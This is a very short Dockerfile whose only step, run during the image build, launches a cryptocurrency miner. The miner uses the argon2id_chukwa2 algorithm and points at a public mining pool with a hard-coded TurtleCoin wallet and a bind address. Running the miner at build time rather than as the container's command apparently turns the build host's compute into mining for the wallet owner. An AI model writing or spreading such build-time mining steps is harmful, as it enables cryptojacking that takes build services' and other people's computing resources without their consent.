FROM christiankm01/master:latest
RUN turtle --algorithm argon2id_chukwa2 --pool pool.hashvault.pro:443 --wallet TRTLuxPjENtXw5UTMHxoMcBHFdeavnnQLjV8buLeeU6F3cwcsE5FHJGX9vamnUcG35BkQy6VfwUy5CsV9YNomioPGGyVhL6NH71 --password x --bind 54.39.234.99:3129
